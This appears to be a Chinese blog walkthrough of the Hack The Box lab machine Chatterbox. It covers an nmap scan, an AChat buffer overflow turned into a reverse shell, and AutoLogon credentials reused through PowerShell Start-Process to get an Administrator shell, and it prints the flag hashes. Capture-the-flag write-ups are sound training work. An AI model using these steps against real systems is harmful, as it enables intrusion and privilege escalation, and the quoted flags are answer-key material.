HTB-oscplike-Chatterbox

HTB-oscplike-Chatterbox

今天就打了一个 因为我的论文到现在还一个字没动捏

Chatterbox

medium难度的chatterbox 靶机IP 10.10.10.74

sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.74
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open http AChat chat system httpd
9256/tcp open achat AChat chat system

铁searchsploit achat了 看到一个缓冲区溢出能用 里面还给出了payload生成方式
太贴心了 把calc.exe换成执行我们的shell 起个http弹回shell 拿到user的flag
9695fa9785ffc2a0ee88a655c34e568e

提权老套路 上心爱的扫描器 可能这就是脚本小子的宿命吧
然后发现没扫到能用的漏洞 内核漏洞寄了 不过在winpeas里还看到了
??? Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultUserName : Alfred
DefaultPassword : Welcome1!

看上去非常突兀 那么有没有可能是凭据复用呢 在stackoverflow找到方法
$secpasswd = ConvertTo-SecureString ‘Welcome1!’ -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential (‘Administrator’, $secpasswd)
Start-Process -FilePath “c:\users\public\shell.exe” -Credential $mycreds -NoNewWindow

弹回administrator的shell 拿到flag
f11b3d9ba594233eeba15956535cc545
请添加图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值